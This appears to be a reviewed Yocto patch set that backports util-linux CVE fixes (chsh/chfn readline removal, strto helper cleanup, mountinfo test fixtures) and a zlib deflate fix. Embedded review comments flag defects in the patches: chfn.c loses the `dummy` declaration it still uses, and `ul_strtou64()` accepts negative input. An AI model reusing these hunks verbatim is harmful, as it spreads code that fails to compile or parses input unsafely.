108+`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
109 rc=0
110diff --git a/tests/expected/findmnt/outputs-kernel b/tests/expected/findmnt/outputs-kernel
111index 59495797bd..01599355ec 100644
112--- a/tests/expected/findmnt/outputs-kernel
113+++ b/tests/expected/findmnt/outputs-kernel
114@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
115 |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
116 | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
117 |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
118-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
119-`-/mnt/foo /fooooo bar rw,relatime
120+`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
121 rc=0
122diff --git a/tests/expected/libmount/tabdiff-mount b/tests/expected/libmount/tabdiff-mount
123index 420aeacd5e..3c18f8dc4f 100644
124--- a/tests/expected/libmount/tabdiff-mount
125+++ b/tests/expected/libmount/tabdiff-mount
126@@ -1,3 +1,2 @@
127 /dev/mapper/kzak-home on /home/kzak: MOUNTED
128-/fooooo on /mnt/foo: MOUNTED
129 tmpfs on /mnt/test/foo bar: MOUNTED
130diff --git a/tests/expected/libmount/tabdiff-move b/tests/expected/libmount/tabdiff-move
131index 24f9bc791b..95820d93ef 100644
132--- a/tests/expected/libmount/tabdiff-move
133+++ b/tests/expected/libmount/tabdiff-move
134@@ -1,3 +1,2 @@
135 //foo.home/bar/ on /mnt/music: MOVED to /mnt/music
136-/fooooo on /mnt/foo: UMOUNTED
137 tmpfs on /mnt/test/foo bar: UMOUNTED
138diff --git a/tests/expected/libmount/tabdiff-remount b/tests/expected/libmount/tabdiff-remount
139index 82ebeab390..876bfd9539 100644
140--- a/tests/expected/libmount/tabdiff-remount
141+++ b/tests/expected/libmount/tabdiff-remount
142@@ -1,4 +1,3 @@
143 /dev/mapper/kzak-home on /home/kzak: REMOUNTED from 'rw,noatime,barrier=1,data=ordered' to 'ro,noatime,barrier=1,data=ordered'
144 //foo.home/bar/ on /mnt/sounds: REMOUNTED from 'rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344' to 'ro,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344'
145-/fooooo on /mnt/foo: UMOUNTED
146 tmpfs on /mnt/test/foo bar: UMOUNTED
147diff --git a/tests/expected/libmount/tabdiff-umount b/tests/expected/libmount/tabdiff-umount
148index a3e0fe48a1..c7be725b92 100644
149--- a/tests/expected/libmount/tabdiff-umount
150+++ b/tests/expected/libmount/tabdiff-umount
151@@ -1,3 +1,2 @@
152 /dev/mapper/kzak-home on /home/kzak: UMOUNTED
153-/fooooo on /mnt/foo: UMOUNTED
154 tmpfs on /mnt/test/foo bar: UMOUNTED
155diff --git a/tests/expected/libmount/tabfiles-parse-mountinfo b/tests/expected/libmount/tabfiles-parse-mountinfo
156index 47eb770061..d5ba5248e4 100644
157--- a/tests/expected/libmount/tabfiles-parse-mountinfo
158+++ b/tests/expected/libmount/tabfiles-parse-mountinfo
159@@ -351,17 +351,6 @@ id: 47
160 parent: 20
161 devno: 0:38
162 ------ fs:
163-source: /fooooo
164-target: /mnt/foo
165-fstype: bar
166-optstr: rw,relatime
167-VFS-optstr: rw,relatime
168-FS-opstr: rw
169-root: /
170-id: 48
171-parent: 20
172-devno: 0:39
173------- fs:
174 source: tmpfs
175 target: /mnt/test/foo bar
176 fstype: tmpfs
177diff --git a/tests/expected/libmount/tabfiles-py-parse-mountinfo b/tests/expected/libmount/tabfiles-py-parse-mountinfo
178index 47eb770061..d5ba5248e4 100644
179--- a/tests/expected/libmount/tabfiles-py-parse-mountinfo
180+++ b/tests/expected/libmount/tabfiles-py-parse-mountinfo
181@@ -351,17 +351,6 @@ id: 47
182 parent: 20
183 devno: 0:38
184 ------ fs:
185-source: /fooooo
186-target: /mnt/foo
187-fstype: bar
188-optstr: rw,relatime
189-VFS-optstr: rw,relatime
190-FS-opstr: rw
191-root: /
192-id: 48
193-parent: 20
194-devno: 0:39
195------- fs:
196 source: tmpfs
197 target: /mnt/test/foo bar
198 fstype: tmpfs
199diff --git a/tests/ts/findmnt/files/mountinfo b/tests/ts/findmnt/files/mountinfo
200index 475ea1a337..ff1e664a84 100644
201--- a/tests/ts/findmnt/files/mountinfo
202+++ b/tests/ts/findmnt/files/mountinfo
203@@ -30,4 +30,3 @@
204 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
205 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
206 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
207-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
208diff --git a/tests/ts/findmnt/files/mountinfo-nonroot b/tests/ts/findmnt/files/mountinfo-nonroot
209index e15b467016..87b421d2ef 100644
210--- a/tests/ts/findmnt/files/mountinfo-nonroot
211+++ b/tests/ts/findmnt/files/mountinfo-nonroot
212@@ -29,4 +29,3 @@
213 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
214 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
215 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
216-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
217diff --git a/tests/ts/libmount/files/mountinfo b/tests/ts/libmount/files/mountinfo
218index c063071833..2b01740481 100644
219--- a/tests/ts/libmount/files/mountinfo
220+++ b/tests/ts/libmount/files/mountinfo
221@@ -30,5 +30,4 @@
222 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
223 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
224 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
225-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
226 49 20 0:56 / /mnt/test/foo bar rw,relatime shared:323 - tmpfs tmpfs rw
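Review bot: The description states that the kernel no longer emits the "(deleted)" suffix in /proc/self/mountinfo, but neither it nor the backport header names the kernel version from which that holds. With the suffix handling removed from `mnt_parse_mountinfo_line()`, a kernel that still appends it would leave the suffix in `fs->target`, so lookups by mount point would presumably stop matching such entries. A line in the patch header giving the oldest kernel this backport was checked against would let BSP layers on older kernels judge the impact. `PATH_DELETED_SUFFIX` may now be unused in tab_parse.c; that cannot be confirmed from the hunk.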
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch b/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch
new file mode 100644
index 0000000000..54b496ea3f
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch
@@ -0,0 +1,161 @@
1From faa5a3a83ad0cb5e2c303edbfd8cd823c9d94c17 Mon Sep 17 00:00:00 2001
2From: Karel Zak <kzak@redhat.com>
3Date: Thu, 10 Feb 2022 12:03:17 +0100
4Subject: [PATCH] chsh, chfn: remove readline support [CVE-2022-0563]
5
6The readline library uses INPUTRC= environment variable to get a path
7to the library config file. When the library cannot parse the
8specified file, it prints an error message containing data from the
9file.
10
11Unfortunately, the library does not use secure_getenv() (or a similar
12concept) to avoid vulnerabilities that could occur if set-user-ID or
13set-group-ID programs.
14
15Reported-by: Rory Mackie <rory.mackie@trailofbits.com>
16Signed-off-by: Karel Zak <kzak@redhat.com>
17
18Upstream-status: Backport
19https://github.com/util-linux/util-linux/commit/faa5a3a83ad0cb5e2c303edbfd8cd823c9d94c17
20
21CVE: CVE-2022-0563
22
23Signed-off-by: Steve Sakoman <steve@sakoman.com>
24
25---
26 login-utils/Makemodule.am | 2 +-
27 login-utils/chfn.c | 16 +++------------
28 login-utils/chsh.c | 42 ++-------------------------------------
29 3 files changed, 6 insertions(+), 54 deletions(-)
30
31diff --git a/login-utils/Makemodule.am b/login-utils/Makemodule.am
32index fac5bfc..73636af 100644
33--- a/login-utils/Makemodule.am
34+++ b/login-utils/Makemodule.am
35@@ -82,7 +82,7 @@ chfn_chsh_sources = \
36 login-utils/ch-common.c
37 chfn_chsh_cflags = $(SUID_CFLAGS) $(AM_CFLAGS)
38 chfn_chsh_ldflags = $(SUID_LDFLAGS) $(AM_LDFLAGS)
39-chfn_chsh_ldadd = libcommon.la $(READLINE_LIBS)
40+chfn_chsh_ldadd = libcommon.la
41
42 if CHFN_CHSH_PASSWORD
43 chfn_chsh_ldadd += -lpam
44diff --git a/login-utils/chfn.c b/login-utils/chfn.c
45index b739555..2f8e44a 100644
46--- a/login-utils/chfn.c
47+++ b/login-utils/chfn.c
48@@ -56,11 +56,6 @@
49 # include "auth.h"
50 #endif
51
52-#ifdef HAVE_LIBREADLINE
53-# define _FUNCTION_DEF
54-# include <readline/readline.h>
55-#endif
56-
57 struct finfo {
58 char *full_name;
59 char *office;
60@@ -229,22 +224,17 @@ static char *ask_new_field(struct chfn_control *ctl, const char *question,
61 {
62 int len;
63 char *buf;
64-#ifndef HAVE_LIBREADLINE
65- size_t dummy = 0;
66-#endif
67
68 if (!def_val)
69 def_val = "";
70+
71 while (true) {
72 printf("%s [%s]: ", question, def_val);
73 __fpurge(stdin);
74-#ifdef HAVE_LIBREADLINE
75- rl_bind_key('\t', rl_insert);
76- if ((buf = readline(NULL)) == NULL)
77-#else
78+
79 if (getline(&buf, &dummy, stdin) < 0)
80-#endif
81 errx(EXIT_FAILURE, _("Aborted."));
82+
83 /* remove white spaces from string end */
84 ltrim_whitespace((unsigned char *) buf);
85 len = rtrim_whitespace((unsigned char *) buf);
86diff --git a/login-utils/chsh.c b/login-utils/chsh.c
87index a9ebec8..ee6ff87 100644
88--- a/login-utils/chsh.c
89+++ b/login-utils/chsh.c
90@@ -58,11 +58,6 @@
91 # include "auth.h"
92 #endif
93
94-#ifdef HAVE_LIBREADLINE
95-# define _FUNCTION_DEF
96-# include <readline/readline.h>
97-#endif
98-
99 struct sinfo {
100 char *username;
101 char *shell;
102@@ -121,33 +116,6 @@ static void print_shells(void)
103 endusershell();
104 }
105
106-#ifdef HAVE_LIBREADLINE
107-static char *shell_name_generator(const char *text, int state)
108-{
109- static size_t len;
110- char *s;
111-
112- if (!state) {
113- setusershell();
114- len = strlen(text);
115- }
116-
117- while ((s = getusershell())) {
118- if (strncmp(s, text, len) == 0)
119- return xstrdup(s);
120- }
121- return NULL;
122-}
123-
124-static char **shell_name_completion(const char *text,
125- int start __attribute__((__unused__)),
126- int end __attribute__((__unused__)))
127-{
128- rl_attempted_completion_over = 1;
129- return rl_completion_matches(text, shell_name_generator);
130-}
131-#endif
132-
133 /*
134 * parse_argv () --
135 * parse the command line arguments, and fill in "pinfo" with any
136@@ -198,20 +166,14 @@ static char *ask_new_shell(char *question, char *oldshell)
137 {
138 int len;
139 char *ans = NULL;
140-#ifdef HAVE_LIBREADLINE
141- rl_attempted_completion_function = shell_name_completion;
142-#else
143 size_t dummy = 0;
144-#endif
145+
146 if (!oldshell)
147 oldshell = "";
148 printf("%s [%s]\n", question, oldshell);
149-#ifdef HAVE_LIBREADLINE
150- if ((ans = readline("> ")) == NULL)
151-#else
152 if (getline(&ans, &dummy, stdin) < 0)
153-#endif
154 return NULL;
155+
156 /* remove the newline at the end of ans. */
157 ltrim_whitespace((unsigned char *) ans);
158 len = rtrim_whitespace((unsigned char *) ans);
159--
1602.25.1
161
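Review bot: The chfn.c hunk deletes the declaration `size_t dummy = 0;` together with its `#ifndef HAVE_LIBREADLINE` guard, yet the retained context line still calls `getline(&buf, &dummy, stdin)`, so `ask_new_field()` would not compile as patched. The chsh.c hunk keeps its `size_t dummy = 0;` and drops only the guard. The backport should keep the declaration in chfn.c as well, and since `getline()` needs the pointer to be NULL or a malloc'ed buffer, `char *buf;` should become `char *buf = NULL;`. The recipe's `EXTRA_OECONF` passes `--disable-chfn-chsh`, which would explain why the build does not trip over this, but a layer that re-enables chfn would hit it. `ask_new_field()` continues past the hunk.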
diff --git a/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch b/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch
new file mode 100644
index 0000000000..5d5a370821
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch
@@ -0,0 +1,270 @@
1From 84825b161ba5d18da4142893b9789b3fc71284d9 Mon Sep 17 00:00:00 2001
2From: Karel Zak <kzak@redhat.com>
3Date: Tue, 22 Jun 2021 14:20:42 +0200
4Subject: [PATCH] include/strutils: cleanup strto..() functions
5
6* add ul_strtos64() and ul_strtou64()
7* add simple test
8
9Addresses: https://github.com/karelzak/util-linux/issues/1358
10Signed-off-by: Karel Zak <kzak@redhat.com>
11
12Upstream-Backport: [https://github.com/util-linux/util-linux/commit/84825b161ba5d18da4142893b9789b3fc71284d9]
13Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
14
15---
16 include/strutils.h | 3 +
17 lib/strutils.c | 174 ++++++++++++++++++++++++++-------------------
18 2 files changed, 105 insertions(+), 72 deletions(-)
19
20diff --git a/include/strutils.h b/include/strutils.h
21index e75a2f0e17..389e849905 100644
22--- a/include/strutils.h
23+++ b/include/strutils.h
24@@ -19,6 +19,9 @@ extern int parse_size(const char *str, uintmax_t *res, int *power);
25 extern int strtosize(const char *str, uintmax_t *res);
26 extern uintmax_t strtosize_or_err(const char *str, const char *errmesg);
27
28+extern int ul_strtos64(const char *str, int64_t *num, int base);
29+extern int ul_strtou64(const char *str, uint64_t *num, int base);
30+
31 extern int16_t strtos16_or_err(const char *str, const char *errmesg);
32 extern uint16_t strtou16_or_err(const char *str, const char *errmesg);
33 extern uint16_t strtox16_or_err(const char *str, const char *errmesg);
34diff --git a/lib/strutils.c b/lib/strutils.c
35index ee2c835495..d9976dca70 100644
36--- a/lib/strutils.c
37+++ b/lib/strutils.c
38@@ -319,39 +319,80 @@ char *strndup(const char *s, size_t n)
39 }
40 #endif
41
42-static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base);
43-static uint64_t _strtou64_or_err(const char *str, const char *errmesg, int base);
44+/*
45+ * convert strings to numbers; returns <0 on error, and 0 on success
46+ */
47+int ul_strtos64(const char *str, int64_t *num, int base)
48+{
49+ char *end = NULL;
50
51-int16_t strtos16_or_err(const char *str, const char *errmesg)
52+ errno = 0;
53+ if (str == NULL || *str == '\0')
54+ return -EINVAL;
55+ *num = (int64_t) strtoimax(str, &end, base);
56+
57+ if (errno || str == end || (end && *end))
58+ return -EINVAL;
59+ return 0;
60+}
61+
62+int ul_strtou64(const char *str, uint64_t *num, int base)
63 {
64- int32_t num = strtos32_or_err(str, errmesg);
65+ char *end = NULL;
66
67- if (num < INT16_MIN || num > INT16_MAX) {
68- errno = ERANGE;
69- err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
70- }
71- return num;
72+ errno = 0;
73+ if (str == NULL || *str == '\0')
74+ return -EINVAL;
75+ *num = (uint64_t) strtoumax(str, &end, base);
76+
77+ if (errno || str == end || (end && *end))
78+ return -EINVAL;
79+ return 0;
80 }
81
82-static uint16_t _strtou16_or_err(const char *str, const char *errmesg, int base)
83+/*
84+ * Covert strings to numbers and print message on error.
85+ *
86+ * Note that hex functions (strtox..()) returns unsigned numbers, if you need
87+ * something else then use ul_strtos64(s, &n, 16).
88+ */
89+int64_t strtos64_or_err(const char *str, const char *errmesg)
90 {
91- uint32_t num = _strtou32_or_err(str, errmesg, base);
92+ int64_t num = 0;
93
94- if (num > UINT16_MAX) {
95- errno = ERANGE;
96- err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
97+ if (ul_strtos64(str, &num, 10) != 0) {
98+ if (errno == ERANGE)
99+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
100+
101+ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
102 }
103 return num;
104 }
105
106-uint16_t strtou16_or_err(const char *str, const char *errmesg)
107+uint64_t strtou64_or_err(const char *str, const char *errmesg)
108 {
109- return _strtou16_or_err(str, errmesg, 10);
110+ uint64_t num = 0;
111+
112+ if (ul_strtou64(str, &num, 10)) {
113+ if (errno == ERANGE)
114+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
115+
116+ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
117+ }
118+ return num;
119 }
120
121-uint16_t strtox16_or_err(const char *str, const char *errmesg)
122+uint64_t strtox64_or_err(const char *str, const char *errmesg)
123 {
124- return _strtou16_or_err(str, errmesg, 16);
125+ uint64_t num = 0;
126+
127+ if (ul_strtou64(str, &num, 16)) {
128+ if (errno == ERANGE)
129+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
130+
131+ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
132+ }
133+ return num;
134 }
135
136 int32_t strtos32_or_err(const char *str, const char *errmesg)
137@@ -365,9 +406,9 @@ int32_t strtos32_or_err(const char *str, const char *errmesg)
138 return num;
139 }
140
141-static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base)
142+uint32_t strtou32_or_err(const char *str, const char *errmesg)
143 {
144- uint64_t num = _strtou64_or_err(str, errmesg, base);
145+ uint64_t num = strtou64_or_err(str, errmesg);
146
147 if (num > UINT32_MAX) {
148 errno = ERANGE;
149@@ -376,66 +417,48 @@ static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base)
150 return num;
151 }
152
153-uint32_t strtou32_or_err(const char *str, const char *errmesg)
154-{
155- return _strtou32_or_err(str, errmesg, 10);
156-}
157-
158 uint32_t strtox32_or_err(const char *str, const char *errmesg)
159 {
160- return _strtou32_or_err(str, errmesg, 16);
161+ uint64_t num = strtox64_or_err(str, errmesg);
162+
163+ if (num > UINT32_MAX) {
164+ errno = ERANGE;
165+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
166+ }
167+ return num;
168 }
169
170-int64_t strtos64_or_err(const char *str, const char *errmesg)
171+int16_t strtos16_or_err(const char *str, const char *errmesg)
172 {
173- int64_t num;
174- char *end = NULL;
175-
176- errno = 0;
177- if (str == NULL || *str == '\0')
178- goto err;
179- num = strtoimax(str, &end, 10);
180-
181- if (errno || str == end || (end && *end))
182- goto err;
183+ int64_t num = strtos64_or_err(str, errmesg);
184
185- return num;
186-err:
187- if (errno == ERANGE)
188+ if (num < INT16_MIN || num > INT16_MAX) {
189+ errno = ERANGE;
190 err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
191-
192- errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
193+ }
194+ return num;
195 }
196
197-static uint64_t _strtou64_or_err(const char *str, const char *errmesg, int base)
198+uint16_t strtou16_or_err(const char *str, const char *errmesg)
199 {
200- uintmax_t num;
201- char *end = NULL;
202-
203- errno = 0;
204- if (str == NULL || *str == '\0')
205- goto err;
206- num = strtoumax(str, &end, base);
207-
208- if (errno || str == end || (end && *end))
209- goto err;
210+ uint64_t num = strtou64_or_err(str, errmesg);
211
212- return num;
213-err:
214- if (errno == ERANGE)
215+ if (num > UINT16_MAX) {
216+ errno = ERANGE;
217 err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
218-
219- errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
220+ }
221+ return num;
222 }
223
224-uint64_t strtou64_or_err(const char *str, const char *errmesg)
225+uint16_t strtox16_or_err(const char *str, const char *errmesg)
226 {
227- return _strtou64_or_err(str, errmesg, 10);
228-}
229+ uint64_t num = strtox64_or_err(str, errmesg);
230
231-uint64_t strtox64_or_err(const char *str, const char *errmesg)
232-{
233- return _strtou64_or_err(str, errmesg, 16);
234+ if (num > UINT16_MAX) {
235+ errno = ERANGE;
236+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
237+ }
238+ return num;
239 }
240
241 double strtod_or_err(const char *str, const char *errmesg)
242@@ -1051,15 +1051,25 @@ static int test_strutils_cmp_paths(int a
243
244 int main(int argc, char *argv[])
245 {
246- if (argc == 3 && strcmp(argv[1], "--size") == 0)
247+ if (argc == 3 && strcmp(argv[1], "--size") == 0) {
248 return test_strutils_sizes(argc - 1, argv + 1);
249
250- else if (argc == 4 && strcmp(argv[1], "--cmp-paths") == 0)
251+ } else if (argc == 4 && strcmp(argv[1], "--cmp-paths") == 0) {
252 return test_strutils_cmp_paths(argc - 1, argv + 1);
253
254+ } else if (argc == 3 && strcmp(argv[1], "--str2num") == 0) {
255+ uint64_t n;
256+
257+ if (ul_strtou64(argv[2], &n, 10) == 0) {
258+ printf("'%s' --> %ju\n", argv[2], (uintmax_t) n);
259+ return EXIT_SUCCESS;
260+ }
261+ }
262+
263 else {
264 fprintf(stderr, "usage: %1$s --size <number>[suffix]\n"
265- " %1$s --cmp-paths <path> <path>\n",
266+ " %1$s --cmp-paths <path> <path>\n"
267+ " %1$s --num2num <str>\n",
268 argv[0]);
269 exit(EXIT_FAILURE);
270 }
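Review bot: `ul_strtou64()` inherits the input rules of `strtoumax()`, so a leading sign is accepted and `"-1"` converts to `UINT64_MAX` with `errno` left at 0, and callers get a success return for input that is not an unsigned number. Callers with their own range check, such as the `uid_t` comparison in CVE-2021-3995.patch, reject the wrapped value, but `strtou64_or_err()` and `strtox64_or_err()` pass it through. Extending the entry check to `if (str == NULL || *str == '\0' || strchr(str, '-') != NULL)` rejects negative input before conversion. In the test driver, the `--str2num` branch leaves the if-chain without a `return` when conversion fails, and the usage text advertises `--num2num` instead of `--str2num`. `main()` continues past the hunk.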
diff --git a/meta/recipes-core/util-linux/util-linux_2.35.1.bb b/meta/recipes-core/util-linux/util-linux_2.35.1.bb
index 516b783887..89dc564ecb 100644
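--- a/meta/recipes-core/util-linux/util-linux_2.35.1.bb
+++ b/meta/recipes-core/util-linux/util-linux_2.35.1.bb
@@ -11,6 +11,11 @@ SRC_URI += "file://configure-sbindir.patch \
  file://0001-libfdisk-script-accept-sector-size-ignore-unknown-he.patch \
  file://0001-kill-include-sys-types.h-before-checking-SYS_pidfd_s.patch \
  file://0001-include-cleanup-pidfd-inckudes.patch \
+ file://CVE-2021-37600.patch \
+ file://include-strutils-cleanup-strto-functions.patch \
+ file://CVE-2021-3995.patch \
+ file://CVE-2021-3996.patch \
+ file://CVE-2022-0563.patch \
 "
 SRC_URI[md5sum] = "7f64882f631225f0295ca05080cee1bf"
 SRC_URI[sha256sum] = "d9de3edd287366cd908e77677514b9387b22bc7b88f45b83e1922c3597f1d7f9"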
diff --git a/meta/recipes-core/volatile-binds/files/volatile-binds.service.in b/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
index b23355a714..4b34ebd12d 100644
--- a/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
+++ b/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
@@ -1,6 +1,6 @@
1[Unit] 1[Unit]
2Description=Bind mount volatile @where@ 2Description=Bind mount volatile @where@
3DefaultDependencies=false 3DefaultDependencies=no
4Before=local-fs.target 4Before=local-fs.target
5RequiresMountsFor=@whatparent@ @whereparent@ 5RequiresMountsFor=@whatparent@ @whereparent@
6ConditionPathIsReadWrite=@whatparent@ 6ConditionPathIsReadWrite=@whatparent@
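--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch
@@ -0,0 +1,347 @@
+CVE: CVE-2018-25032
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 5c44459c3b28a9bd3283aaceab7c615f8020c531 Mon Sep 17 00:00:00 2001
+From: Mark Adler <madler@alumni.caltech.edu>
+Date: Tue, 17 Apr 2018 22:09:22 -0700
+Subject: [PATCH] Fix a bug that can crash deflate on some input when using
+ Z_FIXED.
+
+This bug was reported by Danilo Ramos of Eideticom, Inc. It has
+lain in wait 13 years before being found! The bug was introduced
+in zlib 1.2.2.2, with the addition of the Z_FIXED option. That
+option forces the use of fixed Huffman codes. For rare inputs with
+a large number of distant matches, the pending buffer into which
+the compressed data is written can overwrite the distance symbol
+table which it overlays. That results in corrupted output due to
+invalid distances, and can result in out-of-bound accesses,
+crashing the application.
+
+The fix here combines the distance buffer and literal/length
+buffers into a single symbol buffer. Now three bytes of pending
+buffer space are opened up for each literal or length/distance
+pair consumed, instead of the previous two bytes. This assures
+that the pending buffer cannot overwrite the symbol table, since
+the maximum fixed code compressed length/distance is 31 bits, and
+since there are four bytes of pending space for every three bytes
+of symbol space.
+---
+ deflate.c | 74 ++++++++++++++++++++++++++++++++++++++++---------------
+ deflate.h | 25 +++++++++----------
+ trees.c | 50 +++++++++++--------------------------
+ 3 files changed, 79 insertions(+), 70 deletions(-)
+
+diff --git a/deflate.c b/deflate.c
+index 425babc00..19cba873a 100644
+--- a/deflate.c
++++ b/deflate.c
+@@ -255,11 +255,6 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+ int wrap = 1;
+ static const char my_version[] = ZLIB_VERSION;
+
+- ushf *overlay;
+- /* We overlay pending_buf and d_buf+l_buf. This works since the average
+- * output size for (length,distance) codes is <= 24 bits.
+- */
+-
+ if (version == Z_NULL || version[0] != my_version[0] ||
+ stream_size != sizeof(z_stream)) {
+ return Z_VERSION_ERROR;
+@@ -329,9 +324,47 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+
+ s->lit_bufsize = 1 << (memLevel + 6); /* 16K elements by default */
+
+- overlay = (ushf *) ZALLOC(strm, s->lit_bufsize, sizeof(ush)+2);
+- s->pending_buf = (uchf *) overlay;
+- s->pending_buf_size = (ulg)s->lit_bufsize * (sizeof(ush)+2L);
++ /* We overlay pending_buf and sym_buf. This works since the average size
++ * for length/distance pairs over any compressed block is assured to be 31
++ * bits or less.
++ *
++ * Analysis: The longest fixed codes are a length code of 8 bits plus 5
++ * extra bits, for lengths 131 to 257. The longest fixed distance codes are
++ * 5 bits plus 13 extra bits, for distances 16385 to 32768. The longest
++ * possible fixed-codes length/distance pair is then 31 bits total.
++ *
++ * sym_buf starts one-fourth of the way into pending_buf. So there are
++ * three bytes in sym_buf for every four bytes in pending_buf. Each symbol
++ * in sym_buf is three bytes -- two for the distance and one for the
++ * literal/length. As each symbol is consumed, the pointer to the next
++ * sym_buf value to read moves forward three bytes. From that symbol, up to
++ * 31 bits are written to pending_buf. The closest the written pending_buf
++ * bits gets to the next sym_buf symbol to read is just before the last
++ * code is written. At that time, 31*(n-2) bits have been written, just
++ * after 24*(n-2) bits have been consumed from sym_buf. sym_buf starts at
++ * 8*n bits into pending_buf. (Note that the symbol buffer fills when n-1
++ * symbols are written.) The closest the writing gets to what is unread is
++ * then n+14 bits. Here n is lit_bufsize, which is 16384 by default, and
++ * can range from 128 to 32768.
++ *
++ * Therefore, at a minimum, there are 142 bits of space between what is
++ * written and what is read in the overlain buffers, so the symbols cannot
++ * be overwritten by the compressed data. That space is actually 139 bits,
++ * due to the three-bit fixed-code block header.
++ *
++ * That covers the case where either Z_FIXED is specified, forcing fixed
++ * codes, or when the use of fixed codes is chosen, because that choice
++ * results in a smaller compressed block than dynamic codes. That latter
++ * condition then assures that the above analysis also covers all dynamic
++ * blocks. A dynamic-code block will only be chosen to be emitted if it has
++ * fewer bits than a fixed-code block would for the same set of symbols.
++ * Therefore its average symbol length is assured to be less than 31. So
++ * the compressed data for a dynamic block also cannot overwrite the
++ * symbols from which it is being constructed.
++ */
++
++ s->pending_buf = (uchf *) ZALLOC(strm, s->lit_bufsize, 4);
++ s->pending_buf_size = (ulg)s->lit_bufsize * 4;
+
+ if (s->window == Z_NULL || s->prev == Z_NULL || s->head == Z_NULL ||
+ s->pending_buf == Z_NULL) {
+@@ -340,8 +373,12 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+ deflateEnd (strm);
+ return Z_MEM_ERROR;
+ }
+- s->d_buf = overlay + s->lit_bufsize/sizeof(ush);
+- s->l_buf = s->pending_buf + (1+sizeof(ush))*s->lit_bufsize;
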